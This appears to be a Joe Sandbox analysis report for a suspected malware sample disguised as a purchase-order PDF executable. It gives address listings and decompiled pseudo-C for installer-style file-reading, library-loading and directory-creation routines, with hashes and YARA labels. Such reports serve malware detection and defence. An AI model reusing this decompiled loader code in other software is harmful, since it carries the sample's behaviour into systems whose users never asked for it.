0x00000000
0x00000000
0x00406d5f
0x00406d61
0x00406d64
0x00406dd5
0x00406dd8
0x00406ddb
0x00406de2
0x00406dec
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00406d66
0x00406d6a
0x00406d6d
0x00406d6f
0x00406d72
0x00406d75
0x00406d77
0x00406d7a
0x00406d7c
0x00406d81
0x00406d84
0x00406d87
0x00406d8b
0x00406d92
0x00406d95
0x00406d9c
0x00406da0
0x00406da8
0x00406da8
0x00406da8
0x00406da2
0x00406da2
0x00406da2
0x00406d97
0x00406d97
0x00406d97
0x00406dac
0x00406daf
0x00406dcd
0x00406dcf
0x00000000
0x00406db1
0x00406db1
0x00406db4
0x00406db7
0x00406dba
0x00406dbc
0x00406dbc
0x00406dbc
0x00406dbf
0x00406dc2
0x00406dc4
0x00406dc5
0x00406dc8
0x00000000
0x00406dc8
0x00000000
0x00406ffe
0x00407002
0x00407020
0x00407023
0x0040702a
0x0040702d
0x00407030
0x00407033
0x00407036
0x00407039
0x0040703b
0x00407042
0x00407043
0x00407045
0x00407048
0x0040704b
0x0040704e
0x0040704e
0x00407053
0x00000000
0x00407053
0x00407004
0x00407007
0x0040700a
0x00407014
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00000000
0x00000000
0x004070ab
0x004070af
0x00000000
0x00000000
0x004070b5
0x004070b9
0x00000000
0x00000000
0x004070bf
0x004070c1
0x004070c5
0x004070c5
0x004070c8
0x004070cc
0x00000000
0x00000000
0x0040711c
0x00407120
0x00407127
0x0040712a
0x0040712d
0x00407137
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x00407122
0x00000000
0x00000000
0x00407143
0x00407147
0x0040714e
0x00407151
0x00407154
0x00407149
0x00407149
0x00407149
0x00407157
0x0040715a
0x0040715d
0x0040715d
0x00407160
0x00407163
0x00407166
0x00407166
0x00407169
0x00407170
0x00407175
0x00000000
0x00000000
0x00407203
0x00407203
0x00407207
0x004075a5
0x00000000
0x004075a5
0x0040720d
0x00407210
0x00407213
0x00407217
0x0040721a
0x00407220
0x00407222
0x00407222
0x00407222
0x00407225
0x00407228
0x00000000
0x00000000
0x00406df8
0x00406df8
0x00406dfc
0x00407569
0x00000000
0x00407569
0x00406e02
0x00406e05
0x00406e08
0x00406e0c
0x00406e0f
0x00406e15
0x00406e17
0x00406e17
0x00406e17
0x00406e1a
0x00406e1d
0x00406e1d
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00406e29
0x00406e2f
0x00000000
0x00000000
0x00406e35
0x00406e35
0x00406e39
0x00406e3c
0x00406e3f
0x00406e42
0x00406e45
0x00406e46
0x00406e49
0x00406e4b
0x00406e51
0x00406e54
0x00406e57
0x00406e5a
0x00406e5d
0x00406e60
0x00406e63
0x00406e7f
0x00406e82
0x00406e85
0x00406e88
0x00406e8f
0x00406e93
0x00406e95
0x00406e99
0x00406e65
0x00406e65
0x00406e69
0x00406e71
0x00406e76
0x00406e78
0x00406e7a
0x00406e7a
0x00406e9c
0x00406ea3
0x00406ea6
0x00000000
0x00406eac
0x00000000
0x00406eac
0x00000000
0x00406eb1
0x00406eb1
0x00406eb5
0x00407575
0x00000000
0x00407575
0x00406ebb
0x00406ebe
0x00406ec1
0x00406ec5
0x00406ec8
0x00406ece
0x00406ed0
0x00406ed0
0x00406ed0
0x00406ed3
0x00406ed6
0x00406ed6
0x00406ed6
0x00406edc
0x00000000
0x00000000
0x00406ede
0x00406ee1
0x00406ee4
0x00406ee7
0x00406eea
0x00406eed
0x00406ef0
0x00406ef3
0x00406ef6
0x00406ef9
0x00406efc
0x00406f14
0x00406f17
0x00406f1a
0x00406f1d
0x00406f1d
0x00406f20
0x00406f24
0x00406f26
0x00406efe
0x00406efe
0x00406f06
0x00406f0b
0x00406f0d
0x00406f0f
0x00406f0f
0x00406f29
0x00406f30
0x00406f33
0x00000000
0x00406f35
0x00000000
0x00406f35
0x00406f33
0x00406f3a
0x00406f3a
0x00406f3a
0x00406f3a
0x00000000
0x00000000
0x00406f75
0x00406f75
0x00406f79
0x00407581
0x00000000
0x00407581
0x00406f7f
0x00406f82
0x00406f85
0x00406f89
0x00406f8c
0x00406f92
0x00406f94
0x00406f94
0x00406f94
0x00406f97
0x00406f9a
0x00406f9a
0x00406fa0
0x00406f3e
0x00406f3e
0x00406f41
0x00000000
0x00406f41
0x00406fa2
0x00406fa2
0x00406fa5
0x00406fa8
0x00406fab
0x00406fae
0x00406fb1
0x00406fb4
0x00406fb7
0x00406fba
0x00406fbd
0x00406fc0
0x00406fd8
0x00406fdb
0x00406fde
0x00406fe1
0x00406fe1
0x00406fe4
0x00406fe8
0x00406fea
0x00406fc2
0x00406fc2
0x00406fca
0x00406fcf
0x00406fd1
0x00406fd3
0x00406fd3
0x00406fed
0x00406ff4
0x00406ff7
0x00000000
0x00406ff9
0x00000000
0x00406ff9
0x00000000
0x00407286
0x00407286
0x0040728a
0x004075b1
0x00000000
0x004075b1
0x00407290
0x00407293
0x00407296
0x0040729a
0x0040729d
0x004072a3
0x004072a5
0x004072a5
0x004072a5
0x004072a8
0x00000000
0x00000000
0x00407056
0x00407056
0x00407059
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x00000000
0x00407395
0x00407399
0x004073bb
0x004073be
0x004073c8
0x004073cb
0x004073cb
0x00000000
0x004073cb
0x004073cb
0x0040739b
0x0040739e
0x004073a2
0x004073a5
0x004073a5
0x004073a8
0x00000000
0x00000000
0x00407452
0x00407456
0x00407474
0x00407474
0x00407474
0x0040747b
0x00407482
0x00407489
0x00407489
0x00000000
0x00407489
0x00407458
0x0040745b
0x0040745e
0x00407461
0x00407468
0x004073ac
0x004073ac
0x004073af
0x00000000
0x00000000
0x00407543
0x00407546
0x00407447
0x00000000
0x00000000
0x0040717d
0x0040717f
0x00407186
0x00407187
0x00407189
0x0040718c
0x00000000
0x00000000
0x00407194
0x00407197
0x0040719a
0x0040719c
0x0040719e
0x0040719e
0x0040719f
0x004071a2
0x004071a9
0x004071ac
0x004071ba
0x00000000
0x00000000
0x00407490
0x00407490
0x00407493
0x0040749a
0x00000000
0x00000000
0x0040749f
0x0040749f
0x004074a3
0x004075db
0x00000000
0x004075db
0x004074a9
0x004074ac
0x004074af
0x004074b3
0x004074b6
0x004074bc
0x004074be
0x004074be
0x004074be
0x004074c1
0x004074c4
0x004074c4
0x004074c4
0x004074c4
0x004074c7
0x004074c7
0x004074cb
0x0040752b
0x0040752e
0x00407533
0x00407534
0x00407536
0x00407538
0x0040753b
0x00407447
0x00407447
0x00000000
0x0040744d
0x00407447
0x004074cd
0x004074d3
0x004074d6
0x004074d9
0x004074dc
0x004074df
0x004074e2
0x004074e5
0x004074e8
0x004074eb
0x004074ee
0x00407507
0x0040750a
0x0040750d
0x00407510
0x00407514
0x00407516
0x00407516
0x00407517
0x0040751a
0x004074f0
0x004074f0
0x004074f8
0x004074fd
0x004074ff
0x00407502
0x00407502
0x0040751d
0x00407524
0x00000000
0x00407526
0x00000000
0x00407526
0x00000000
0x004071c2
0x004071c5
0x004071fb
0x0040732b
0x0040732b
0x0040732b
0x0040732b
0x0040732e
0x0040732e
0x00407331
0x00407333
0x004075bd
0x00000000
0x004075bd
0x00407339
0x0040733c
0x00000000
0x00000000
0x00407342
0x00407346
0x00407349
0x00407349
0x00407349
0x00000000
0x00407349
0x004071c7
0x004071c9
0x004071cb
0x004071cd
0x004071d0
0x004071d1
0x004071d3
0x004071d5
0x004071d8
0x004071db
0x004071f1
0x004071f6
0x0040722e
0x0040722e
0x00407232
0x0040725e
0x00407260
0x00407267
0x0040726a
0x0040726d
0x0040726d
0x00407272
0x00407272
0x00407274
0x00407277
0x0040727e
0x00407281
0x004072ae
0x004072ae
0x004072b1
0x004072b4
0x00407328
0x00407328
0x00407328
0x00000000
0x00407328
0x004072b6
0x004072bc
0x004072bf
0x004072c2
0x004072c5
0x004072c8
0x004072cb
0x004072ce
0x004072d1
0x004072d4
0x004072d7
0x004072f0
0x004072f2
0x004072f5
0x004072f6
0x004072f9
0x004072fb
0x004072fe
0x00407300
0x00407302
0x00407305
0x00407307
0x0040730a
0x0040730e
0x00407310
0x00407310
0x00407311
0x00407314
0x00407317
0x004072d9
0x004072d9
0x004072e1
0x004072e6
0x004072e8
0x004072eb
0x004072eb
0x0040731a
0x00407321
0x004072ab
0x004072ab
0x004072ab
0x004072ab
0x00000000
0x00407323
0x00000000
0x00407323
0x00407321
0x00407234
0x00407237
0x00407239
0x0040723c
0x0040723f
0x00407242
0x00407244
0x00407247
0x0040724a
0x0040724a
0x0040724d
0x0040724d
0x00407250
0x00407257
0x0040722b
0x0040722b
0x0040722b
0x0040722b
0x00000000
0x00407259
0x00000000
0x00407259
0x00407257
0x004071dd
0x004071e0
0x004071e2
0x004071e5
0x00000000
0x00000000
0x00406f44
0x00406f44
0x00406f48
0x0040758d
0x00000000
0x0040758d
0x00406f4e
0x00406f51
0x00406f54
0x00406f57
0x00406f5a
0x00406f5d
0x00406f60
0x00406f62
0x00406f65
0x00406f68
0x00406f6b
0x00406f6d
0x00406f6d
0x00406f6d
0x00000000
0x00000000
0x004070cf
0x004070cf
0x004070d3
0x00407599
0x00000000
0x00407599
0x004070d9
0x004070dc
0x004070df
0x004070e2
0x004070e4
0x004070e4
0x004070e4
0x004070e7
0x004070ea
0x004070ed
0x004070f0
0x004070f3
0x004070f6
0x004070f7
0x004070f9
0x004070f9
0x004070f9
0x004070fc
0x004070ff
0x00407102
0x00407105
0x00407105
0x00407105
0x00407108
0x0040710a
0x0040710a
0x00000000
0x00000000
0x0040734c
0x0040734c
0x0040734c
0x00407350
0x00000000
0x00000000
0x00407356
0x00407359
0x0040735c
0x0040735f
0x00407361
0x00407361
0x00407361
0x00407364
0x00407367
0x0040736a
0x0040736d
0x00407370
0x00407373
0x00407374
0x00407376
0x00407376
0x00407376
0x00407379
0x0040737c
0x0040737f
0x00407382
0x00407385
0x00407389
0x0040738b
0x0040738e
0x00000000
0x00407390
0x0040710d
0x0040710d
0x00000000
0x0040710d
0x0040738e
0x004075c3
0x00000000
0x00000000
0x00406bf2
0x004075fa
0x004075fa
0x00000000
0x004075fa
0x00407447
0x004073ce
0x004073cb

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction ID: 947ff9f4813c08031b822263453b6bbc7859602ae013fffc9a74d3363ad91bbb
Opcode Fuzzy Hash: b33066b9a67caffcdb2859c2a3d237c195f810e8b6f417b46283b98aba377de3
Instruction Fuzzy Hash: FE713471E04228DBEF28CF98C8547ADBBB1FF44305F15806AD856BB281C778A986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00403479 Relevance: 4.6, APIs: 3, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00403479(intOrPtr _a4) {
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t34 =  *0x420ef4 -  *0x40ce60 + _a4;
				 *0x42a26c = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E0040302E(1);
					return 0;
				}
				E004035F8( *0x420f04);
				SetFilePointer( *0x40a01c,  *0x40ce60, 0, 0); // executed
				 *0x420f00 = _t34;
				 *0x420ef0 = 0;
				while(1) {
					_t31 = 0x4000;
					_t11 =  *0x420ef8 -  *0x420f04;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E004035E2(0x414ef0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x420f04 =  *0x420f04 + _t31;
					 *0x40ce80 = 0x414ef0;
					 *0x40ce84 = _t31;
					L6:
					L6:
					if( *0x42a270 != 0 &&  *0x42a300 == 0) {
						 *0x420ef0 =  *0x420f00 -  *0x420ef4 - _a4 +  *0x40ce60;
						E0040302E(0);
					}
					 *0x40ce88 = 0x40cef0;
					 *0x40ce8c = 0x8000; // executed
					_t14 = E00406BB0(0x40ce68); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce88; // 0x412588
					_t37 = _t36 - 0x40cef0;
					if(_t37 == 0) {
						__eflags =  *0x40ce84; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x420ef4;
						if(_t16 -  *0x40ce60 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E0040620A( *0x40a01c, 0x40cef0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce60 =  *0x40ce60 + _t37;
					_t49 =  *0x40ce84; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x00403489
0x0040349c
0x004034a1
0x004035d1
0x004035d3
0x00000000
0x004035d9
0x004034ad
0x004034c0
0x004034c6
0x004034cc
0x004034d7
0x004034dc
0x004034e1
0x004034e9
0x004034eb
0x004034eb
0x004034f4
0x004034fb
0x00000000
0x00000000
0x00403501
0x00403507
0x0040350d
0x00000000
0x00403513
0x00403519
0x00403539
0x0040353e
0x00403543
0x00403549
0x0040354f
0x00403559
0x00403560
0x00000000
0x00000000
0x00403562
0x00403568
0x0040356a
0x0040358d
0x00403593
0x00000000
0x00000000
0x00403595
0x00403597
0x00000000
0x00000000
0x00403599
0x00403599
0x004035ac
0x00000000
0x00000000
0x004035bb
0x00000000
0x004035bb
0x00403574
0x0040357b
0x004035c8
0x004035ce
0x004035ce
0x00000000
0x004035ce
0x0040357d
0x00403583
0x00403589
0x00000000
0x00000000
0x00000000
0x004035cc
0x004035cc
0x00000000
0x004035cc
0x00000000

APIs

GetTickCount.KERNEL32 ref: 0040348D

Part of subcall function 004035F8: SetFilePointer.KERNEL32(00000000,00000000,00000000,004032F6,?), ref: 00403606

SetFilePointer.KERNEL32(00000000,00000000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 004034C0
SetFilePointer.KERNEL32(?,00000000,00000000,00414EF0,00004000,?,00000000,004033A3,00000004,00000000,00000000,?,?,0040331D,000000FF,00000000), ref: 004035BB

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: FilePointer$CountTick
String ID:
API String ID: 1092082344-0
Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00403371 Relevance: 3.1, APIs: 2, Instructions: 88
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
				long _v8;
				long _t21;
				long _t22;
				void* _t24;
				long _t26;
				int _t27;
				long _t28;
				void* _t29;
				void* _t30;
				long _t31;
				long _t32;
				long _t36;

				_t21 = _a4;
				if(_t21 >= 0) {
					_t32 = _t21 +  *0x42a2b8;
					 *0x420ef4 = _t32;
					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
				}
				_t22 = E00403479(4);
				if(_t22 >= 0) {
					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
					if(_t24 == 0) {
						L18:
						_push(0xfffffffd);
						goto L19;
					} else {
						 *0x420ef4 =  *0x420ef4 + 4;
						_t36 = E00403479(_a4);
						if(_t36 < 0) {
							L21:
							_t22 = _t36;
						} else {
							if(_a12 != 0) {
								_t26 = _a4;
								if(_t26 >= _a16) {
									_t26 = _a16;
								}
								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
								if(_t27 != 0) {
									_t36 = _v8;
									 *0x420ef4 =  *0x420ef4 + _t36;
									goto L21;
								} else {
									goto L18;
								}
							} else {
								if(_a4 <= 0) {
									goto L21;
								} else {
									while(1) {
										_t28 = _a4;
										if(_a4 >= 0x4000) {
											_t28 = 0x4000;
										}
										_v8 = _t28;
										_t29 = E004061DB( *0x40a01c, 0x414ef0, _t28); // executed
										if(_t29 == 0) {
											goto L18;
										}
										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
										if(_t30 == 0) {
											_push(0xfffffffe);
											L19:
											_pop(_t22);
										} else {
											_t31 = _v8;
											_a4 = _a4 - _t31;
											 *0x420ef4 =  *0x420ef4 + _t31;
											_t36 = _t36 + _t31;
											if(_a4 > 0) {
												continue;
											} else {
												goto L21;
											}
										}
										goto L22;
									}
									goto L18;
								}
							}
						}
					}
				}
				L22:
				return _t22;
			}

0x00403375
0x0040337e
0x00403387
0x0040338b
0x00403396
0x00403396
0x0040339e
0x004033a5
0x004033b7
0x004033be
0x00403463
0x00403463
0x00000000
0x004033c4
0x004033c7
0x004033d3
0x004033d7
0x00403471
0x00403471
0x004033dd
0x004033e0
0x0040343f
0x00403445
0x00403447
0x00403447
0x00403459
0x00403461
0x00403468
0x0040346b
0x00000000
0x00000000
0x00000000
0x00000000
0x004033e2
0x004033e5
0x00000000
0x004033eb
0x004033f0
0x004033f7
0x004033fa
0x004033fc
0x004033fc
0x00403409
0x0040340c
0x00403413
0x00000000
0x00000000
0x0040341c
0x00403423
0x0040343b
0x00403465
0x00403465
0x00403425
0x00403425
0x00403428
0x0040342b
0x00403431
0x00403437
0x00000000
0x00403439
0x00000000
0x00403439
0x00403437
0x00000000
0x00403423
0x00000000
0x004033f0
0x004033e5
0x004033e0
0x004033d7
0x004033be
0x00403473
0x00403476

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a290;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42924c =  *0x42924c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0);
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(?,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction ID: af17251ef12b8b272b5eaf8d1bef107274ce64b6e67bb2dd4604cf2723900e86
Opcode Fuzzy Hash: 09e122a9c5ca6d14e20a0c17f6d9bb0c47d9e5f073d0cae9cf8d248ab6fa9320
Instruction Fuzzy Hash: 6F012831724220EBEB295B389D05B6A3698E710714F10857FF855F76F1E678CC029B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00406A35 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406A35(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004069C5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406a3d
0x00406a40
0x00406a47
0x00406a4f
0x00406a5b
0x00000000
0x00406a62
0x00406a52
0x00406a59
0x00000000
0x00406a6a
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
GetProcAddress.KERNEL32(00000000,?), ref: 00406A62

Part of subcall function 004069C5: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004069DC
Part of subcall function 004069C5: wsprintfW.USER32 ref: 00406A17
Part of subcall function 004069C5: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A2B

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction ID: 0464b4a7853edb7079d0776797c383171681067eb8499b99987f1e8ea9f8efb8
Opcode Fuzzy Hash: 2c5be687f5fa61a336a49914f64a515c5dfea5ee9312c993601bf5eaa599f6ad
Instruction Fuzzy Hash: E0E086727042106AD210A6745D08D3773E8ABC6711307883EF557F2040D738DC359A79

Uniqueness

Uniqueness Score: -1.00%

Function 00406158 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00406158(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x0040615c
0x00406169
0x0040617e
0x00406184

APIs

GetFileAttributesW.KERNEL32(00000003,00403113,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 0040615C
CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405C16 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405C16(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405c1c
0x00405c24
0x00000000
0x00405c2a
0x00000000

APIs

CreateDirectoryW.KERNEL32(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
GetLastError.KERNEL32 ref: 00405C2A

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
